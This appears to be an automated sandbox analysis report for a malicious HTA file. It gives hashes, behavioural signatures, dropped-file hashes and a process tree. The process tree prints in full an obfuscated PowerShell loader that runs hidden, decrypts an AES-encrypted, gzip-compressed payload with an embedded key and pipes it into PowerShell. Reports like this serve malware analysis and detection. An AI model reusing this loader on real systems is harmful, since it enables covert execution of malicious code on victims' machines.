Analysis
-
max time kernel
142s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
26-08-2023 15:15
Static task
static1
Behavioral task
behavioral1
Sample
b5f52078915dbe23dcb847e7badd546e1325403e56694ea624aac39c68d6f985_JC.hta
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
b5f52078915dbe23dcb847e7badd546e1325403e56694ea624aac39c68d6f985_JC.hta
Resource
win10v2004-20230703-en
General
-
Target
b5f52078915dbe23dcb847e7badd546e1325403e56694ea624aac39c68d6f985_JC.hta
-
Size
1.1MB
-
MD5
674e3c0ae0f2627c10b58a717ee093bd
-
SHA1
21f15d58046119712572a5114b781027c99f7bc4
-
SHA256
b5f52078915dbe23dcb847e7badd546e1325403e56694ea624aac39c68d6f985
-
SHA512
4d6444d49befa990756aa4e668ac6b664b4bdd1b19bf3914afe067ed0ed0d6ee6e34a114e0a47d1363bcf588b307f032b3c0638620385f02d12583f1706d37ef
-
SSDEEP
1536:7pLwiizmnY5q7O2Db9L1/j/SFBOWrhRxPNahQo8y8Im+lIWFT5YhmFfON/H8P2c0:7ppizmnYs7Og9LNjaH1rhRxPNahYYPs
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 17 228 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1764 powershell.exe 1764 powershell.exe 3788 powershell.exe 228 powershell.exe 3788 powershell.exe 228 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1764 powershell.exe Token: SeDebugPrivilege 3788 powershell.exe Token: SeDebugPrivilege 228 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4120 wrote to memory of 1764 4120 mshta.exe 83 PID 4120 wrote to memory of 1764 4120 mshta.exe 83 PID 4120 wrote to memory of 1764 4120 mshta.exe 83 PID 1764 wrote to memory of 2428 1764 powershell.exe 89 PID 1764 wrote to memory of 2428 1764 powershell.exe 89 PID 1764 wrote to memory of 2428 1764 powershell.exe 89 PID 2428 wrote to memory of 3788 2428 cmd.exe 91 PID 2428 wrote to memory of 3788 2428 cmd.exe 91 PID 2428 wrote to memory of 3788 2428 cmd.exe 91 PID 2428 wrote to memory of 228 2428 cmd.exe 92 PID 2428 wrote to memory of 228 2428 cmd.exe 92 PID 2428 wrote to memory of 228 2428 cmd.exe 92
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\b5f52078915dbe23dcb847e7badd546e1325403e56694ea624aac39c68d6f985_JC.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $jvrvREYW = 'AAAAAAAAAAAAAAAAAAAAACgiT7Y6Z5d/gZwdUWnb/wGi4NctLSgkyccbly+bEqQsyRsSSqGsbJkH8xfddXt1oDHIKDlWlkPbqfbGz7Pqyi8DESzA5X9WncEpM+hQdLk6SnFNyN7Jv2VHG5Kfp/y4cw1AfxzLYmEGNCdUsR1JiqlFnCLj02Pq6PcZynb5Srpc8xDiyvtwMifuO7Na/a3hWjJ/MxJ0qCdBl/uag/A2lOte5S6dmgxB97AjvlQD6+XzkIpm+Cyd13C7wRAQ4ezINZzs9oMChO54QkRC7+AZhpVgw/vSUr2Mvo6rBLBD2SUx5mLjXOUlfO+qI8/RuDoqKji4hNYsRRDe5jcSwTHMTNf8Zea5zKrBV0yduMUBgDZRVfPAyLyF0IJeTgCsNNbtcNItTHW6NpzI3L7dyfL23vAMG0YpE2wIidNAvyYzYwKb5HUYHGRciHJCm2zyT0ohu27CR7v63ad1DRUiBdR8CHxLodUpDYz49YAwcpcNOKw+kAJ6C7662AFYdrwJFzRI4hpUd6smMl0xS25yr4eIxgEk5AZ02dptSG5SP5bsrq+N52rMlvKV2VlMTc9j61edotkWFoFj6H5rLeTWngfraYY1+qRFh4KQYqN48hPLqo2q+qbwsxRRVU9JHGRjARME4Gu1WOqX5dv/RhQH0w+67EGyyLZa8osvyqrrOqA5QhXMuZT1zB/XuQu9Xd2jPpYTcCxQ6uUH3snmxKT6yEZVA0S3SguKXBxUZ80uGEe2VuaUzDT+nFDoKUUuubIb4CU66ScnyzfXI5LeB+9/TtowRSaEpy1CVhMl6WZ/fYRXvk1lGnJPrhZfbPSYZZx/k7VyhKYHe2AY2YeMItx3v3PGULaX9ktSeiJ2T6N7ZE85xKZ+SD1xgIPv7grsnTBCKR9I8qjIcjVh3W//6FkCBv9WLc+jmfnvFATuBwxGAvSx5/IQKf0nG+wvVZVRl0Z6WuysQ8BMMd7HJ4PD4tPpM7etQiFPIMdiMXUgc5608zbHvqmuhn/03fZlHLqON4OhTX1a7Z+vVxp0gMIoox1wBxuCzws=';$buWIRXRM = 'Y3J5enZTRlFMY1lVZkFzdFdhUkFpZnpQTkhuRlF5UFE=';$WpUVMfnw = New-Object 'System.Security.Cryptography.AesManaged';$WpUVMfnw.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpUVMfnw.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpUVMfnw.BlockSize = 128;$WpUVMfnw.KeySize = 256;$WpUVMfnw.Key = [System.Convert]::FromBase64String($buWIRXRM);$wQRtj = [System.Convert]::FromBase64String($jvrvREYW);$DzLdUhRi = $wQRtj[0..15];$WpUVMfnw.IV = $DzLdUhRi;$jJnybVCSh = $WpUVMfnw.CreateDecryptor();$HDfASYyGf = $jJnybVCSh.TransformFinalBlock($wQRtj, 16, $wQRtj.Length - 16);$WpUVMfnw.Dispose();$RtuBu = New-Object System.IO.MemoryStream( , $HDfASYyGf );$coZHjS = New-Object System.IO.MemoryStream;$ZbwYXDHvr = New-Object System.IO.Compression.GzipStream $RtuBu, ([IO.Compression.CompressionMode]::Decompress);$ZbwYXDHvr.CopyTo( $coZHjS );$ZbwYXDHvr.Close();$RtuBu.Close();[byte[]] $lBmCn = $coZHjS.ToArray();$EcHwkbNX = [System.Text.Encoding]::UTF8.GetString($lBmCn);$EcHwkbNX | powershell - }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe $jvrvREYW = 'AAAAAAAAAAAAAAAAAAAAACgiT7Y6Z5d/gZwdUWnb/wGi4NctLSgkyccbly+bEqQsyRsSSqGsbJkH8xfddXt1oDHIKDlWlkPbqfbGz7Pqyi8DESzA5X9WncEpM+hQdLk6SnFNyN7Jv2VHG5Kfp/y4cw1AfxzLYmEGNCdUsR1JiqlFnCLj02Pq6PcZynb5Srpc8xDiyvtwMifuO7Na/a3hWjJ/MxJ0qCdBl/uag/A2lOte5S6dmgxB97AjvlQD6+XzkIpm+Cyd13C7wRAQ4ezINZzs9oMChO54QkRC7+AZhpVgw/vSUr2Mvo6rBLBD2SUx5mLjXOUlfO+qI8/RuDoqKji4hNYsRRDe5jcSwTHMTNf8Zea5zKrBV0yduMUBgDZRVfPAyLyF0IJeTgCsNNbtcNItTHW6NpzI3L7dyfL23vAMG0YpE2wIidNAvyYzYwKb5HUYHGRciHJCm2zyT0ohu27CR7v63ad1DRUiBdR8CHxLodUpDYz49YAwcpcNOKw+kAJ6C7662AFYdrwJFzRI4hpUd6smMl0xS25yr4eIxgEk5AZ02dptSG5SP5bsrq+N52rMlvKV2VlMTc9j61edotkWFoFj6H5rLeTWngfraYY1+qRFh4KQYqN48hPLqo2q+qbwsxRRVU9JHGRjARME4Gu1WOqX5dv/RhQH0w+67EGyyLZa8osvyqrrOqA5QhXMuZT1zB/XuQu9Xd2jPpYTcCxQ6uUH3snmxKT6yEZVA0S3SguKXBxUZ80uGEe2VuaUzDT+nFDoKUUuubIb4CU66ScnyzfXI5LeB+9/TtowRSaEpy1CVhMl6WZ/fYRXvk1lGnJPrhZfbPSYZZx/k7VyhKYHe2AY2YeMItx3v3PGULaX9ktSeiJ2T6N7ZE85xKZ+SD1xgIPv7grsnTBCKR9I8qjIcjVh3W//6FkCBv9WLc+jmfnvFATuBwxGAvSx5/IQKf0nG+wvVZVRl0Z6WuysQ8BMMd7HJ4PD4tPpM7etQiFPIMdiMXUgc5608zbHvqmuhn/03fZlHLqON4OhTX1a7Z+vVxp0gMIoox1wBxuCzws=';$buWIRXRM = 'Y3J5enZTRlFMY1lVZkFzdFdhUkFpZnpQTkhuRlF5UFE=';$WpUVMfnw = New-Object 'System.Security.Cryptography.AesManaged';$WpUVMfnw.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpUVMfnw.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpUVMfnw.BlockSize = 128;$WpUVMfnw.KeySize = 256;$WpUVMfnw.Key = [System.Convert]::FromBase64String($buWIRXRM);$wQRtj = [System.Convert]::FromBase64String($jvrvREYW);$DzLdUhRi = $wQRtj[0..15];$WpUVMfnw.IV = $DzLdUhRi;$jJnybVCSh = $WpUVMfnw.CreateDecryptor();$HDfASYyGf = $jJnybVCSh.TransformFinalBlock($wQRtj, 16, $wQRtj.Length - 16);$WpUVMfnw.Dispose();$RtuBu = New-Object System.IO.MemoryStream( , $HDfASYyGf );$coZHjS = New-Object System.IO.MemoryStream;$ZbwYXDHvr = New-Object System.IO.Compression.GzipStream $RtuBu, ([IO.Compression.CompressionMode]::Decompress);$ZbwYXDHvr.CopyTo( $coZHjS );$ZbwYXDHvr.Close();$RtuBu.Close();[byte[]] $lBmCn = $coZHjS.ToArray();$EcHwkbNX = [System.Text.Encoding]::UTF8.GetString($lBmCn);$EcHwkbNX | powershell -3⤵
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe $jvrvREYW = 'AAAAAAAAAAAAAAAAAAAAACgiT7Y6Z5d/gZwdUWnb/wGi4NctLSgkyccbly+bEqQsyRsSSqGsbJkH8xfddXt1oDHIKDlWlkPbqfbGz7Pqyi8DESzA5X9WncEpM+hQdLk6SnFNyN7Jv2VHG5Kfp/y4cw1AfxzLYmEGNCdUsR1JiqlFnCLj02Pq6PcZynb5Srpc8xDiyvtwMifuO7Na/a3hWjJ/MxJ0qCdBl/uag/A2lOte5S6dmgxB97AjvlQD6+XzkIpm+Cyd13C7wRAQ4ezINZzs9oMChO54QkRC7+AZhpVgw/vSUr2Mvo6rBLBD2SUx5mLjXOUlfO+qI8/RuDoqKji4hNYsRRDe5jcSwTHMTNf8Zea5zKrBV0yduMUBgDZRVfPAyLyF0IJeTgCsNNbtcNItTHW6NpzI3L7dyfL23vAMG0YpE2wIidNAvyYzYwKb5HUYHGRciHJCm2zyT0ohu27CR7v63ad1DRUiBdR8CHxLodUpDYz49YAwcpcNOKw+kAJ6C7662AFYdrwJFzRI4hpUd6smMl0xS25yr4eIxgEk5AZ02dptSG5SP5bsrq+N52rMlvKV2VlMTc9j61edotkWFoFj6H5rLeTWngfraYY1+qRFh4KQYqN48hPLqo2q+qbwsxRRVU9JHGRjARME4Gu1WOqX5dv/RhQH0w+67EGyyLZa8osvyqrrOqA5QhXMuZT1zB/XuQu9Xd2jPpYTcCxQ6uUH3snmxKT6yEZVA0S3SguKXBxUZ80uGEe2VuaUzDT+nFDoKUUuubIb4CU66ScnyzfXI5LeB+9/TtowRSaEpy1CVhMl6WZ/fYRXvk1lGnJPrhZfbPSYZZx/k7VyhKYHe2AY2YeMItx3v3PGULaX9ktSeiJ2T6N7ZE85xKZ+SD1xgIPv7grsnTBCKR9I8qjIcjVh3W//6FkCBv9WLc+jmfnvFATuBwxGAvSx5/IQKf0nG+wvVZVRl0Z6WuysQ8BMMd7HJ4PD4tPpM7etQiFPIMdiMXUgc5608zbHvqmuhn/03fZlHLqON4OhTX1a7Z+vVxp0gMIoox1wBxuCzws=';$buWIRXRM = 'Y3J5enZTRlFMY1lVZkFzdFdhUkFpZnpQTkhuRlF5UFE=';$WpUVMfnw = New-Object 'System.Security.Cryptography.AesManaged';$WpUVMfnw.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpUVMfnw.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpUVMfnw.BlockSize = 128;$WpUVMfnw.KeySize = 256;$WpUVMfnw.Key = [System.Convert]::FromBase64String($buWIRXRM);$wQRtj = [System.Convert]::FromBase64String($jvrvREYW);$DzLdUhRi = $wQRtj[0..15];$WpUVMfnw.IV = $DzLdUhRi;$jJnybVCSh = $WpUVMfnw.CreateDecryptor();$HDfASYyGf = $jJnybVCSh.TransformFinalBlock($wQRtj, 16, $wQRtj.Length - 16);$WpUVMfnw.Dispose();$RtuBu = New-Object System.IO.MemoryStream( , $HDfASYyGf );$coZHjS = New-Object System.IO.MemoryStream;$ZbwYXDHvr = New-Object System.IO.Compression.GzipStream $RtuBu, ([IO.Compression.CompressionMode]::Decompress);$ZbwYXDHvr.CopyTo( $coZHjS );$ZbwYXDHvr.Close();$RtuBu.Close();[byte[]] $lBmCn = $coZHjS.ToArray();$EcHwkbNX = [System.Text.Encoding]::UTF8.GetString($lBmCn);$EcHwkbNX4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3788
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:228
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:940
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
Filesize
15KB
MD511eec72a652882159e7f1e766042c3ac
SHA167da138ffa377ceced84c3531f6a489ea1d045a6
SHA25682e4df2c15de3b56db173ee194e9a00187c6e2484c7ede0493bba36dc7b8ba90
SHA5127eac3f2a9906c81750830e708589bbbcb72833d90f459bf5125f0a3b400db3adb81dfb32e5f724b55d5ed0d7007ca3820809351ce3aa5e14f0ab23c696833a72
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82